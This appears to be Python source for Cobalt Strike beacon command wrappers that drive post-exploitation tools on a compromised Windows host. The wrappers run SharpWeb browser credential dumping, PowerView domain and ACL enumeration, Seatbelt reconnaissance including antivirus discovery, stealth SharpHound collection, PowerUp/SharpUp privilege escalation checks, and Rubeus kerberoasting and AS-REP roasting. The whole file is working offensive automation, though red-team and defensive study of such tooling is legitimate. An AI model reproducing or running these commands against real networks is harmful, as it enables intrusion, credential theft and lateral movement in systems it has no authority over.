def _(bid, out=None): args = ['all'] # output file if out: args += ['-o', out] external.run(bid, 'sharpweb', args)
def _(bid): temp = helpers.guess_temp(bid) # Forests and trusts: # Get-DomainTrustMapping # Get-ForestTrust # Get-DomainTrust # Parsing GPOs: # Get-GptTmpl # Get-GroupsXML # File shares: # Get-DomainFileServer # Get-DomainDFSShare # Get-DomainManagedSecurityGroup? # TODO remove subnet and site? # computer objects don't show up in Get-DomainObject for some reason command = helpers.code_string(r""" cd {} $FormatEnumerationLimit=-1 Get-DomainObject | Format-List -Property * > objects.domain Get-DomainPolicyData | Format-List -Property * > policy.domain Get-DomainSite | Format-List -Property * > sites.domain Get-DomainSubnet | Format-List -Property * > subnets.domain Get-DomainGPOUserLocalGroupMapping | Format-List -Property * > gpo_localgroups.domain Get-GPODelegation | Format-List -Property * > gpo_delegations.domain Get-DomainGPO | %{{Get-ObjectACL -ResolveGUIDs -Name $_.Name}} > gpo_acls.domain Get-DomainTrustMapping | Format-List -Property * > trusts.domain Get-DomainManagedSecurityGroup | Format-List -Property * > managers.domain Invoke-ACLScanner -ResolveGUIDs > interesting_acls.domain echo "All finished with domain-enum. Run domain-enum-next." """.format(powershell_quote(temp))) aggressor.btask( bid, 'Tasked beacon to enumerate domain objects and info (stage 1/3)') external.run(bid, 'powerview', command)
def _(bid, *args): external.run(bid, 'seatbelt', ['user'] + list(args))
def _(bid, *args): external.run(bid, 'seatbelt', args)
def _(bid, *args): external.run(bid, 'seatbelt', ['system'] + list(args))
def _(bid, *args): external.run(bid, 'powerview', 'Invoke-FileFinder {}'.format(' '.join(args)))
def callback(bid, *args, function=function): external.run(bid, 'powerview', '{} {}'.format(function, ' '.join(args)))
def _(bid): external.run(bid, 'seatbelt', 'Patches')
def _(bid, *args): external.run( bid, 'powerup', '$FormatEnumerationLimit=-1; Invoke-AllChecks | Format-List' + ' '.join(args))
def _(bid, *args): external.run(bid, 'seatbelt', ['all', 'full'] + list(args))
def _(bid): external.run(bid, 'seatbelt', ['BasicOSInfo', 'UserFolders', 'AntiVirusWMI', 'InterestingProcesses'])
def _(bid, *args): external.run(bid, 'grouper', list(args))
def _(bid): external.run(bid, 'seatbelt', ['AllTcpConnections', 'AllUdpConnections'])
def _(bid, *args): external.run(bid, 'sharphound', ['--CollectionMethod', 'All'] + list(args))
def _(bid, *args): external.run(bid, 'sharphound', ['--Stealth'] + list(args))
def _(bid, *args): external.run(bid, 'sharphound', list(args))
def _(bid, *args): external.run( bid, 'powerview', 'Find-LocalAdminAccess {}; echo "Finished with Find-LocalAdminAccess"'. format(' '.join(args)))
def _(bid, *args): external.run( bid, 'powerview', 'Invoke-ShareFinder -CheckShareAccess {}'.format(' '.join(args)))
def _(bid): external.run(bid, 'seatbelt', 'MappedDrives')
def _(bid, *args): external.run(bid, 'rubeus', args)
def _(bid): external.run(bid, 'seatbelt', ['BasicOSInfo', 'UACSystemPolicies', 'Patches', 'TokenGroupPrivs', 'LocalGroupMembers'])
def _(bid, *args): external.run(bid, 'rubeus', ['kerberoast'] + args)
def _(bid, *args): external.run(bid, 'powerup', '$FormatEnumerationLimit=-1; ' + ' '.join(args))
def _(bid): external.run(bid, 'rubeus', ['kerberoast']) external.run(bid, 'rubeus', ['asreproast'])
def _(bid, *args): external.run(bid, 'sharpup', args)
def _(bid, *args): external.run(bid, 'powerview', args)